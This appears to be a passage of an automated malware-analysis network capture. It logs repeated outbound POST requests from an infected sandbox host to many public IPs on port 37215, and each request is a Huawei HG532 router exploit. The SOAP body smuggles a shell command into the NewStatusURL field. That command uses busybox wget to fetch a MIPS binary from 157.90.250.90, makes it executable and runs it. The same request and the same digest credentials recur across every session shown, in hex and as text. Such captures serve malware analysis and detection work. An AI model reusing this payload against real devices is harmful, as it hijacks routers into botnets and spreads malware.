                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    71192.168.2.2335620156.29.58.5537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803781033 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    72192.168.2.2349966156.180.14.8637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803847075 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    73192.168.2.2350588156.23.144.8137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803921938 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    74192.168.2.233849641.29.43.12337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804013968 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    75192.168.2.233496641.38.16.10337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804085970 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    76192.168.2.2357306156.110.162.23937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804148912 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    77192.168.2.2352456197.123.236.3237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804248095 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    78192.168.2.2354440197.25.2.2837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804332018 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    79192.168.2.235211441.185.84.3237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804393053 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    80192.168.2.2335976197.220.67.11237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.804452896 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
